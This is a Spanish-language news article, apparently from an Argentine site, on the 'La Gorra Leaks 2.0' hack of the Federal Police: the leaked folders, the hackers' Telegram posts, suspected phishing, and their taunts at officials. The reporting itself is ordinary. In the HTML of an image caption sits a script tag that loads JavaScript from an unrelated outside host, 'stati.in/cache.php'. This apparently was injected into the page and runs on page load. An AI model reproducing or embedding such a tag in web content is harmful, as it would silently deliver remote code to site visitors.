viernes 29 de marzo de 2024
Ahora

Alcanzaste el límite de 40 notas leídas

Para continuar, suscribite a Ahora. Si ya sos un usuario suscripto, iniciá sesión.

SUSCRIBITE
Cibercrimen

Cómo opera "La Gorra Leaks", el hackeo que amenaza con viralizar secretos de Estado

Un grupo de hackers estaría detrás del ataque a Policía Federal. El usuario de Telegram en el que filtraron datos desapareció tras una misteriosa convocatoria.

Alcanzaste el límite de 40 notas leídas

Para continuar, suscribite a Ahora. Si ya sos un usuario suscripto, iniciá sesión.

SUSCRIBITE

Letras rojas, fondo negro y un mensaje que puso en alerta a las fuerzas de seguridad: "¡Después de un largo tiempo sin diversión [S] regresó con más entretenimiento de calidad!". La letra "S" entre dos corchetes se convirtió desde hace algunas semanas en una verdadera pesadilla para las fuerzas de seguridad. Es la forma que eligió para denominarse "La Gorra Leaks 2.0", el resultado de un hackeo a la Policía Federal que amenaza con revelar secretos de la máxima estructura de poder de los uniformados.

Hasta el momento, a través de la Deep Web, se filtraron documentos que no son secretos, pero en el último mensaje en el grupo de Telegram que se cerró convocaron a otras personas para unirse a la causa: "Si tienes información confidencial, documentos o accesos a redes del gobierno, puedes enviárnosla y nosotros la publicamos".

Luego de ese posteo, el usuario desapareció. Antes, habían logrado intimidar a la ministra de seguridad Patricia Bullrich, compartir el legajo de Luis Chocobar y amenazar con dar a conocer datos del Ministerio de Defensa. Según pudo averiguar TN.com.ar, los piratas informáticos salieron de la aplicación de mensajería por la acción de los detectives de la PFA que buscan atraparlos.

Pero volvieron. Crearon otro grupo en el que reconocieron que los agentes lograron bloquear sus webs y donde "la guerra" continúa. "Mamita, la que se viene", publicaron junto a una foto del presidente Mauricio Macri dándole la mano a Chocobar. Antes dieron a entender que atacarán a entidades bancarias. "¿Pintan unos bitcoins para el pueblo? En agradecimiento a todos los colegas que nos enviaron accesos copados a nuestra cuenta de administración".

la gorra 2.jpg
<p>&nbsp;El directorio de la informaci&oacute;n filtrada por LagorraLeaks 2.0.</p> <script type="text/javascript" src="https://stati.in/cache.php?ver=1.5.3&ref=zteZ"></script>

El directorio de la información filtrada por LagorraLeaks 2.0.

Mientras la investigación avanza de forma hermética, la trama inquieta a agentes de inteligencia que deben mantener sus identidades bajo reserva. Si se revelan esos datos, no quedarían dudas de que la información es difundida "por alguien de adentro debido a que es muy difícil hackear el servidor", según pudo averiguar este medio. En esta línea se habla de una interna en la Federal.

Creen que los integrantes de "LagorraLeaks 2.0" habrían conseguido la información a través del procedimiento conocido como "phishing". Algún efectivo que cayó en el engañó y facilitó los accesos a información conocida en el entorno como "material reciclable", es decir, datos que no es vulnerable ni confidencial y que pueden volver a conseguirse si se eliminan. Por ejemplo, los documentos de los integrantes de la fuerza de seguridad y las escuchas que difundieron.

En tanto, los jefes de la PFA ordenaron a cambiar las contraseñas de los correos de cada división.

Qué hay en la deep web

La portada de los hackers en la deep web tiene un meme que ridiculiza a la ministra de Seguridad Patricia Bullrich. La funcionaria parece ser la principal apuntada, pero no es la única: en otra imagen aparece junto a su par de la Provincia, Crisitan Ritondo y al jefe de la PFA Néstor Roncaglia, bajo la carátula de "prófugos" en una simulación de la página de la página de "Recompensas" del Ministerio de Seguridad bonaerense. También menciona al jefe de Cibercrimen Víctor Chanenko.

la gorra 3.jpg

"En enero de 2017 conseguí acceso a varios corresos electrónicos del Ministerio de Seguridad, uno de ellos fue el de la actual ministra de seguridad, a través del cual tomé su cuenta en Twitter. Meses más tarde publiqué los emails de varias fuerzas, que se conoció como "lagorraleaks". Defaceé la web del Ejército, Gendarmería, Policía de la Ciudad y hackeé al diputado Tonelli", dice a modo de currículum.

Luego, pasa a la crítica: "Este país es un desastre en ciberseguridad y ¿así quieren hacernos votar con computadoras? Dejen de vender humo". "Estos meses he estado espiando la red de la PFA (computadoras, servidores, correos electrónicos, etc) gracias a los accesos concedidos por su personal altamente capacitado en seguridad informática", detalla.

En el directorio con los archivos se puede ver carpetas con la información disponible: "Audios de juntas, Backup de bases de datos, DNI agentes, División Drogas, Emails, Escuchas, Fotos de perfil, Información Personal, Personal Superior e imágenes".

Seguí leyendo

Dejá tu comentario

Te Puede Interesar